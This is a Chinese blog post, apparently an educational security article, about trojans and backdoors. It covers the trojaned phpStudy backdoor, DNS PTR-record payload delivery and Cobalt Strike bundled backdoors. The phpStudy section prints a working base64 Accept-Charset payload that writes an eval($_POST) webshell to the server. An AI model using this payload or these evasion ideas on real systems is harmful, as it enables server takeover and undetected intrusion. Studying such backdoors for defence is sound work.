一、认识木马与后门

后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法。在软件的开发阶段,程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。但是,如果这些后门被其他人知道,或是在发布软件之前没有删除后门程序,那么它就成了安全风险,容易被黑客当成漏洞进行攻击。

木马则是入侵者利用网络服务的小漏洞,进行扩展,把小漏洞做成了一个后门,从而“大大方方”进入防护措施后面,进行网络入侵行为。

本着不断学习和探索的态度,这里只是列举一些木马和后门,在安全情势严峻的条件下,之后我们势必会学习到更多的后门和后门案例。如果您在很久之后能读到我的这篇文章,请不要停止学习,可前往此文章所在专栏下,寻找【木马】或【后门】的文章。感谢!

二、木马与后门

1.phpStudy后门

涉及版本:phpstudy 2016 php5.4 和 phpstudy2018 php-5.2.17 和php-5.4.45

后门来由:攻击者通过在原无后门的软件中植入后门,并进行发布。当用户下载篡改后的phpStudy后,就变成了受害者,沦为肉鸡。(听起来就像钓鱼,这种事在移动安全场景中更常见呢)后门代码存在于\ext\phpxmlrpc.dll 模块中 phpStudy2016 和 phpStudy2018自带 php-5.2.17、 php-5.4.45 phpStudy2016 路径 php\php-5.2.17\ext\phpxmlrpc.dll php\php-5.4.45\ext\phpxmlrpc.dll、phpStudy2018 路径 PHPTutorial\php\php-5.2.17\ext\phpxmlrpc.dll、PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

漏洞证明:

1.安装并启动phpstudy2016

爆木马,咱先不管它,哈哈

2.查看得知此时开启phpstudy的机器ip为10.163.0.49,现在访问10.163.0.49/index.php

将一句话木马system('echo ^<?php @eval($_POST["shell"])?^>>PHPTutorial\WWW\shell.php');,base64编码后,添加get请求键值对Accept-charset:c3lzdGVtKCdlY2hvIF48P3BocCBAZXZhbCgkX1BPU1RbInNoZWxsIl0pP14+PlBIUFR1dG9yaWFsXFdXV1xzaGVsbC5waHAnKTs=

此时,一句话木马写入了服务器,用菜刀连一下即可控制服务器:

总结一下本次的后门事件,黑客伪造了一个看似安全的软件,在其中安插了后门,通过正常访问首页的字段中插入指定操作的base64,进而控制使用phpstudy便捷搭建起来的服务器。

嗯,技术虽高,心比较毒,不宜学习。

2.DNS后门

https://www.freebuf.com/articles/network/185324.html

DNS中的PTR记录可以存放几乎任何我们想要的东西,接下来的要说DNS后门的利用的设计思路。我们可以将payload放在PTR记录中,做好IP和域名的映射。只要在被攻击者主机上用DNS协议反向解析这个IP ,payload就会被接收。最重要的一点在于,大部分的防火墙、入侵检测系统和态势感知系统并不会审计DNS协议,所以这段流量几乎是不会被拦截的;并且这段paylaod并不会被保存在文件中,而是存在内存里,也可以绕过本地杀软的查杀。

3.利用CobaltStrike捆绑后门

CobaltStrike是渗透测试中常用的一个后渗透工具,它可以快速地生成后门并通过其控制目标主机。其中,捆绑型后门是攻击者较为喜欢的一种后门,因为其具有较好的隐蔽性及免杀效果。

安装可以参考:https://www.dazhuanlan.com/2019/12/15/5df63c6420716/ ,如果系统版本不同,百度一下就可以。资源可以在下方【我的资源】进行下载。

首先先在一台机器上,开启CS服务器:

此时在mac上(啥都行)开启客户端:

关于细致的学习和使用,在后面我们仔细说。

使用cs和msf配合,可以打造各种穿透力强的木马,从而成为自己进入“广阔世界”的后门。

这篇文章就到这儿,下回再见。

【Web安全】木马与后门相关推荐

  1. linux 查杀php木马,linux上php木马、后门查杀总结

    Web Server(Nginx为例) 1.为防止跨站感染,要做虚拟主机目录隔离(我是直接利用fpm建立多个程序池达到隔离效果) 2.上传目录.include类的库文件目录要禁止代码执行(Nginx正 ...

  2. 灰鸽子--木马、后门实验

    目录 实验目的 实验要求 实验原理 实验环境 实验步骤 实验目的 1.了解木马攻击的原理. 2. 掌握木马与后门工作机制 3. 掌握木马与后门的防范措施 实验要求 利用灰鸽子客户端配置服务器程序并生成 ...

  3. php 一句话木马、后门

    强悍的PHP一句话后门 这类后门让网站.服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的.今天我们细数一些有意思的PHP一句话木马. 利用4 ...

  4. webshell、木马与后门之间的区别

    webshell是web入侵的脚本攻击工具.简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网站服务器的web目录中,与 ...

  5. Web端口复用正向后门研究实现与防御

    0×01背景 现在的很多远控/后门因为目前主流防火墙规则的限制,基本上都采用TCP/UDP反弹回连的通讯形式:但是在较高安全环境下,尤其负责web相关业务的环境,因为安防设备(防火墙,IDS,IPS等 ...

  6. 常用网站木马文件后门检测工具

    我们从网上下载web源码的时候有时会不小心下到带后门的程序,可以使用以下介绍的几款Webshell查杀工具来检测一下,软件查后门需多方对比,有能力请手动验证.资源来源于loc. 一.D盾_Web查杀 ...

  7. 检测捆绑木马及后门de方法

    直接进入主题,这些方法是我常用的方法.也是我个人的经验,本人技术有限哪里说得不好请大家见谅.(以下为本人纯手工打,有的为借鉴) 1.手动查找软件捆绑 我这里拿cmd.exe和udp.exe做测试来检测 ...

  8. 在WEB程序中隐藏后门

    作者: 空虚浪子心 在很多商业程序中,程序员也许会出于某种目的,在程序中留下后门.我们不讨论这样做的目的是什么,只谈谈如何在程序中隐藏一个"终极后门".首先给大家看一个例子,去年我 ...

  9. php执行cmd/shell命令 木马小后门

    php执行shell命令,可以使用下面几个函数: string system ( string $command [, int &$return_var ] )string exec ( st ...

最新文章

  1. @available 和 #available
  2. 如何短时间提高python面向对象_初识Python面向对象阶段,你们都是怎么过来的?
  3. 01.The Introduction of Linux
  4. iPad导入Mac:非常快!一气呵成,直接去photo里面选择,之后左上角倒出就好,颠覆之前windows上面的认知!
  5. 4.3 IDEA 常用快捷键
  6. Gridview行随鼠标变色
  7. scala和java像不像_关于Java和Scala同步的五件事你不知道
  8. php 文章读取_php实现获取文章内容第一张图片的方法
  9. Andrew Ng机器学习之一 导论
  10. loadrunner学习记录一
  11. 2016-01-17
  12. pil python 安装_20行Python代码给微信头像戴帽子
  13. ORACLE中关于外键缺少索引的探讨和总结
  14. 暴力/set Codeforces Round #291 (Div. 2) C. Watto and Mechanism
  15. Java_键盘输入语句
  16. 使用Python脚本将酷狗音乐的缓存文件修改为可播放
  17. python+selenium+autoit实现自动百度识图
  18. 游戏研发人才学校培养、企业需求与个人快速成长,华科校友分享了这些实用观点
  19. pic单片机c语言读eeprom,PIC单片机应用专题二内外EEPROM读写..doc
  20. 人工智能在集装箱识别中应用

热门文章

  1. 九、MyBatis的缓存
  2. powershell cs上线_红队CS工具的基本使用
  3. J2EE开发 day1
  4. python爬虫(一):模拟登陆微博
  5. PCA的C++与sklearn实现
  6. [网络工程师]-华为交换机基础认识
  7. 为什么IT管理员需要一个自动补丁管理软件?
  8. 视频处理软件BB FlashBack更新至v5.27,提高摄像头FPS
  9. 计算机网络安全教程 石国志,网络安全课程设计
  10. Android Wifi开发——WiFi连接(八)